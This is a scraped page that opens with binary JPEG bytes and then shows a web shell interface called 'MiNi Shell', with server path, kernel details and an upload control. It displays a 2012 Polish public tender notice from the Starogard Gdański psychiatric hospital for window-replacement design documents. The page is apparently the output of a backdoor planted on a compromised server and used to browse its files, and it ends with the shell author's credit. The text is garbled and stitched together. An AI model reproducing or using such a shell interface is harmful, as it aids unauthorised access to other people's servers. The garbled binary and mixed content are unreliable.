JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120615/205182-N-2012.html

<p class="kh_header"><b>Starogard Gdański: Wykonanie dokumentacji projektowej dla zadania inwestycyjnego pod nazwą
Wymiana stolarki okiennej w pawilonach dla chorych nr VI, VII, XVII, XIX, XX - w ramach rozszerzenia projektu Modernizacja systemu zaopatrzenia w ciepło Szpitala dla Nerwowo i Psych. Chorych w Starogardzie Gd. z przejściem z węgla na gaz z blokiem kogeneracyjnym i wymianą sieci parowej na wodną w  Szpitalu dla Nerwowo i Psychicznie Chorych w Starogardzie Gd. ul. Skarszewska nr 7.</b><br>
<b>Numer ogłoszenia: 205182 - 2012; data zamieszczenia: 15.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital dla Nerwowo i Psychicznie Chorych im. Stanisława Kryzana , ul. Skarszewska 7, 83-200 Starogard Gdański, woj. pomorskie, tel. (058) 5620600, faks (058) 5623650.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kocborowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej dla zadania inwestycyjnego pod nazwą
Wymiana stolarki okiennej w pawilonach dla chorych nr VI, VII, XVII, XIX, XX - w ramach rozszerzenia projektu Modernizacja systemu zaopatrzenia w ciepło Szpitala dla Nerwowo i Psych. Chorych w Starogardzie Gd. z przejściem z węgla na gaz z blokiem kogeneracyjnym i wymianą sieci parowej na wodną w  Szpitalu dla Nerwowo i Psychicznie Chorych w Starogardzie Gd. ul. Skarszewska nr 7..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowo- kosztorysowej  wraz z przedmiarem robót i specyfikacją techniczną wykonania i odbioru robót, dla zadania pod nazwą : 
 Wymiana stolarki okiennej w pawilonach  dla chorych nr VI, VII, XVII, XIX, XX - w ramach rozszerzenia projektu Modernizacja systemu zaopatrzenia w ciepło Szpitala dla Nerwowo  i Psych. Chorych w Starogardzie Gd. z przejściem z węgla na gaz z blokiem kogeneracyjnym i wymianą sieci parowej na wodną w Szpitalu dla Nerwowo i Psychicznie Chorych w Starogardzie Gd. ul. Skarszewska nr 7.

2. Dokumentację należy opracować w fazie projektu budowlanego. 

3. Dokumentacja określająca przedmiot zamówienia ma spełniać wymagania obowiązujących przepisów i polskich norm, a także wymagań  technicznych  niezbędnych  do złożenia w sposób prawidłowy zamówienia publicznego i oferty na to zamówienie dla wykonania zadania inwestycyjnego w pełnym zakresie oraz w sposób nadający się do realizacji i eksploatacji bez wad.

4. Załącznikami do SIWZ są :

A/ Projekty architektoniczne (nie aktualizowane) pawilonów :
-Pawilon nr 6 - projekt techniczny Biura Projektowo Badawczego Budownictwa Ogólnego MIASTOPROJEKT GDAŃSK z 1986 r.
-Pawilon nr 7 - projekt- Remont kapitalny pawilonu dla chorych nr 7 Biura Projektów Budownictwa Komunalnego  w Gdańsku z 1986 r.
-Pawilon nr 17 - projekt budowlano-wykonawczy rozbudowy i przebudowy paw 17 Pracowni  Projektowej mgr inż. Marii  Landowskiej Starogard Gd. z 2005 r.
-Pawilon nr 19 - projekt techniczny Biura Projektowo Badawczego Budownictwa Ogólnego MIASTOPROJEKT GDAŃSK z 1989 r.
-Pawilon nr 20 - projekt- Przebudowa z nadbudową pawilonu nr 20 Biura Projektów Budownictwa Komunalnego  w Gdańsku  z 1982 r.
B/ Wyrys z mapy ewidencyjnej

5. Materiały wyjściowe do projektowania
A/ Projekty architektoniczne (nie aktualizowane) pawilonów :
-Pawilon nr 6 - projekt techniczny Biura Projektowo Badawczego Budownictwa Ogólnego MIASTOPROJEKT GDAŃSK z 1986 r.
-Pawilon nr 7 - projekt- Remont kapitalny pawilonu dla chorych nr 7 Biura Projektów Budownictwa Komunalnego  w Gdańsku z 1986 r.
-Pawilon nr 17 - projekt budowlano-wykonawczy rozbudowy i przebudowy paw 17 Pracowni  Projektowej mgr inż. Marii  Landowskiej Starogard Gd. z 2005 r.
-Pawilon nr 19 - projekt techniczny Biura Projektowo Badawczego Budownictwa Ogólnego MIASTOPROJEKT GDAŃSK z 1989 r.
-Pawilon nr 20 - projekt- Przebudowa z nadbudową pawilonu nr 20 Biura Projektów Budownictwa Komunalnego  w Gdańsku  z 1982 r.
B/ Wyrys z mapy ewidencyjnej
C/ Audyt energetyczny

Wykonawca z którym zostanie zawarta umowa otrzyma wymienione dokumenty w ust. 5A, 5B, 5C,  które po wykorzystaniu wraz z gotową dokumentacją projektową zwróci Zamawiającemu.

6. Wykonawca z którym zostanie zawarta umowa zobowiązany będzie zaktualizować ilość okien.

7. Założenia projektowe obejmują :
-Wymianę okien drewnianych skrzynkowych z podokiennikami wewnętrznymi, na okna drewniane  nietypowe łukowe z  drewna  sosnowego klejonego, fabrycznie wykończone, z podokiennikami wewnętrznymi z konglomeratów kamiennych na spoiwie  poliestrowym, malowane w  kolorze białym z okuciami bez klamek, otwierane kluczem/klamką  nasadową lub imbusową, wyposażone w wietrzniki higrosterowalne,  skrzydła uchylno-rozwieralne ze szczebliną drewnianą stałą, szyby zespolone U=1.mW/m2K bezpieczne od wewnątrz, (w sanitariatach matowe) z zachowaniem  istniejącego wzoru .
- obróbkę ościeży z uszczelnieniem  styku ościeżnic z  murem, naprawą tynków i uzupełnieniem malowania

8. Zakres prac projektowych musi być zgodny  z :
-   Ustawą z dnia 07.07.1994 r. - Prawo Budowlane (tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623)
- Rozporządzeniem Ministra Zdrowia z dnia 2. lutego 2011 r. w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2011 r. nr 31 poz. 158)
- Rozporządzeniem Ministra Infrastruktury z dnia 12.04.2002 r w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r Nr 75 poz. 690) z późniejszymi zmianami.
- Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006  r.  w sprawie ochrony przeciwpożarowej  budynków, innych obiektów budowlanych i terenów (Dz. U.  z 2010 r. nr 109, poz 719 )
 - Rozporządzeniem  Ministra Spraw  Wewnętrznych i Administracji z dnia 16 czerwca 2003 r. w sprawie uzgadniania projektu budowlanego pod względem ochrony przeciwpożarowej (Dz. U. z 2009 r. Nr 119, poz. 998)
-  Rozporządzeniem ministra Infrastruktury z dnia 02.09.2004 r. (Dz.U. z 2004 r. Nr 202 poz. 2072) w sprawie szczegółowego zakresu formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno - użytkowego
- Rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120 poz. 1126)
- Rozporządzenia Ministra Infrastruktury z dnia 03.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133)
- Obowiązującymi normami projektowania, przepisami techniczno - budowlanymi i zasadami wiedzy technicznej
- Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130 poz. 1389)
- Ustawą z dnia 23.07.2003 r o ochronie zabytków i opiece nad zabytkami (Dz. U, z 2003 r. Nr 162 poz. 1568) z uwagi na fakt wpisania zespołu budynków Szpitala do Rejestru zabytków - decyzja             nr 1111 z dnia 17.10.1994 r. Państwowej Służby Ochrony Zabytków Oddział Wojewódzki w Gdańsku
- Warunkami zawartymi w niniejszej SIWZ i dołączonych do niej załącznikach.

9. Opracowanie projektowe musi zawierać:
 1/ Projekt budowlany wymagany przez art. 33 i art. 34 Prawa Budowlanego dla uzyskania pozwolenia na budowę 
 2/ Specyfikacje techniczne wykonania i  odbioru robót budowlano - montażowych
Zamawiający wymaga aby Wykonawca opracował specyfikację techniczną wykonania i odbioru robót budowlanych w zakresie i formie zgodnej z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. (Dz. U. z 2004 r. Nr 202 poz. 2072) w sprawie szczegółowego zakresu i formy dokumentacji projektowej specyfikacji technicznych wykonania i odbioru robót budowlanych oraz audytem energetycznym.
Celem specyfikacji jest jednoznaczne określenie przedmiotu robót objętych dokumentacją projektową i jej konkretnymi rozwiązaniami pod kątem wymagań jakościowych i materiałowych, warunków i kolejności technologicznej wykonywania robót z zapewnieniem  użytkowania  obiektu i świadczenia usług, warunków technicznych odbioru poszczególnych rodzajów robót i ich elementów 
3/ Przedmiary robót
Przedmiar robót powinien stanowić opis robót w kolejności technologicznej ich wykonania oraz podstawę do ustalenia jednostkowych nakładów rzeczowych z podaniem ilości jednostek przedmiarowych robót i obliczeń ich ilości na podstawie  dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlano - montażowych.
Przedmiary robót należy opracować odrębnie na poszczególne pawilony podając lokalizację i wymiarowanie.
Przedmiary robót muszą obejmować zestawienie wszystkich robót i czynności wynikające z projektu i  specyfikacji technicznych wykonania i odbioru robót.

Przedmiary stanowić będą podstawę do sporządzenia przez Wykonawcę robót szczegółowego kosztorysu ofertowego i określenie ceny oferty w zamówieniu publicznym na wykonanie zadania inwestycyjnego  kompletnego pod względem celu  któremu ma służyć, winny one zawierać wytyczne i dane wyjściowe do jego sporządzenia.

Formularz przedmiaru musi zawierać wyraźne odniesienie do pozycji Specyfikacji Technicznej wykonania i odbioru robót.

4/ Opracowanie kosztowe

-Kosztorys inwestorski
Kosztorysy inwestorskie  należy sporządzić metodą szczegółową na podstawie obowiązujących KNR zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia  18.05.2004 r. w sprawie metod i podstaw sporządzenia kosztorysu inwestorskiego (Dz. U. z 2004 r. Nr 130  poz. 1389) 
- Kosztorys inwestorski  należy opracować wg  wskaźników i średnich cen krajowych z  publikacji ORGBUD SERWIS za poprzedni  kwartał.

Założenia wyjściowe do kosztorysowania będą przedmiotem uzgodnień z  Zamawiającym przed  sporządzeniem kosztorysu inwestorskiego - (w związku z potrzebą  uzgodnienia zastosowanych rozwiązań materiałowych oraz uwzględnienia wymiany najbardziej zniszczonych okien w I etapie).

10. Opracowania projektowe należy przekazać Zamawiającemu  w ilości egzemplarzy:

- 5  egz. projektu budowlanego wymaganego przez Prawo budowlane dla uzyskania pozwolenia na budowę,
- 7 egz. w wersji elektronicznej na nośniku CD w formacie pdf projektów do celów wykonawczych zawierających: projekt budowlany, specyfikacje techniczne wykonania i odbioru robót budowlanych, przedmiar robót
- 3 egz. kosztorysu inwestorskiego w układzie jak przedmiar robót
- 1 komplet  w wersji elektronicznej w uzgodnionym formacie (kosztorysy i przedmiary sporządzone  w  formacie  obsługiwanym przez program NORMA , opisy <w formacie .doc> i rysunki w formatach do edycji <.dwg>, oraz całość w formacie pdf).          

11. Zakres uzgodnień
  Dla kompletności wykonania przedmiotu zamówienia od Wykonawcy wymaga się:
- w trakcie wykonania prac projektowych dokonania roboczych uzgodnień z Zamawiającym i zainteresowanymi instytucjami
- dokonania uzgodnień projektu budowlanego  z :
- Pomorskim Wojewódzkim Konserwatorem Zabytków w Gdańsku, ul. Kotwiczników 20
- Rzeczoznawcami  jeżeli są wymagane:
d/s BHP i ergonomii
d/s P. POŻ
d/s sanitarno - higienicznych
- Instytucjami i organami, których konieczność wyłoni się w toku prac projektowych

 Uzgodnienia wymagane w/g ust. 11 winny być zawarte w:
- projektach budowlanych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.00.00-6, 71.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - minimum jedną dokumentację projektowo kosztorysową obejmującą wymianę stolarki okiennej wraz z potwierdzeniem, że została ona wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli osoba/osoby podpisująca ofertę działa na podstawie upoważnienia (pełnomocnictwa) - pełnomocnictwo musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie). Złożenie kopii pełnomocnictwa poświadczonego samodzielnie przez pełnomocnika nie jest wystarczające i skutkuje wezwaniem do uzupełnienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kocborowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1.osobiście - siedziba Szpitala- adres j.w. pokój nr 7 bud. adm., 2.za pomocą poczty-adres j.w., 3.faxem-58 56 236 50, 4.pocztą e-mail: k.narloch@kocborowo.pl, 5. ze strony www.kocborowo.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2012 godzina 13:00, miejsce: Sekretariat pokój nr 1, budynek administracyjny Szpitala Dla Nerwowo i Psychicznie Chorych imienia Stanisława Kryzana  w Starogardzie Gdańskim, ul. Skarszewska 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego na lata 2007 - 2013, Osi Priorytetowej 5, Środowisko i energetyka przyjazna środowisku, działanie 5.5 Infrastruktura energetyczna i poszanowanie energii.

Dokładny termin realizacji : Termin wykonania zamówienia ustala się na 6 tygodni od daty zawarcia umowy, w tym :
- projekty budowlane w terminie 4 tygodni od daty zawarcia umowy.
- projekty wykonawcze, specyfikacja techniczna wykonania i odbioru robót budowlanych, przedmiary, kosztorysy inwestorskie, w terminie 6 tygodni od daty zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com